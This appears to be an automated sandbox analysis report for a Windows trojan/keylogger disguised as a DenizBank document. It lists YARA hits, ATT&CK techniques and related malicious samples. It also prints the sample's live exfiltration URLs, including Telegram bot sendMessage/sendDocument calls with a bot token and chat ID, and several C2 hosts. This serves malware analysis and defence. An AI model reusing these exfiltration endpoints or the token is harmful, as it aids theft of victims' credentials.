Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	112 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	1 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
denizbank 25.11.2024 E80 aspc.exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.Genie
denizbank 25.11.2024 E80 aspc.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/11/2024%20/%2007:56:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://reallyfreegeoip.org/xml/8.46.123.75	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://tempuri.org/DataSet1.xsd	denizbank 25.11.2024 E80 aspc.exe	false	high
http://www.tiro.com	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000004004000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FB6000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E12000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000004004000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FB6000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E12000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.carterandcone.coml	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.typography.netD	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?L	denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E62000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E18000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003DED000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FBC000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003F91000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E62000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003E18000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003DED000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003FBC000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4218909070.0000000003F91000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799143667.0000000002846000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802075013.0000000006982000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802050663.00000000058B0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-455	denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562235
Start date and time:	2024-11-25 11:41:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	denizbank 25.11.2024 E80 aspc.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/8@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 100 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: denizbank 25.11.2024 E80 aspc.exe

Simulations

Behavior and APIs

Time	Type	Description
05:42:07	API Interceptor	6143833x Sleep call for process: denizbank 25.11.2024 E80 aspc.exe modified
05:42:09	API Interceptor	9x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	DESIGN LOGO.exe	Get hash	malicious	AgentTesla	Browse
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	WV7Gj9lJ7W.exe	Get hash	malicious	XWorm	Browse
104.21.67.152	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Papyment_Advice.exe	Get hash	malicious	MassLogger RAT	Browse
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	SOA SEP 2024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
193.122.130.0	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SOA SEP 2024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
reallyfreegeoip.org	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
api.telegram.org	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DESIGN LOGO.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
bg.microsoft.map.fastly.net	http://propdfhub.com	Get hash	malicious	Unknown	Browse	199.232.210.172
	05.Unzipped.obfhotel22-11.js	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	412300061474#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	199.232.210.172
	somes.exe	Get hash	malicious	RedLine	Browse	199.232.210.172
	docx008.docx.doc	Get hash	malicious	Unknown	Browse	199.232.210.172
	segura.vbs	Get hash	malicious	Remcos	Browse	199.232.210.172
	docx005.docxopendir.doc	Get hash	malicious	Unknown	Browse	199.232.210.172
	pm4ozz83c4.vbs	Get hash	malicious	Unknown	Browse	199.232.210.172
	Synliggre.vbs	Get hash	malicious	Remcos, GuLoader	Browse	199.232.214.172
	Salary_Increase_Letter_Nov'24.vbs	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PaymentAdvice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	S50MC-C_3170262-7.6cylinder_liner.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DESIGN LOGO.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
CLOUDFLARENETUS	http://propdfhub.com	Get hash	malicious	Unknown	Browse	104.18.30.234
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	http://taerendil.free.fr/Kzf20FukxrNV0r0Xw3	Get hash	malicious	Unknown	Browse	104.16.40.28
	IaslcsMo.ps1	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
	https://google.lt/amp/taerendil.online.fr/gpfv9cqYcuejGaVElbEvNcI6wCkeo	Get hash	malicious	Unknown	Browse	104.16.40.28
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	DATASHEET.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
ORACLE-BMC-31898US	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
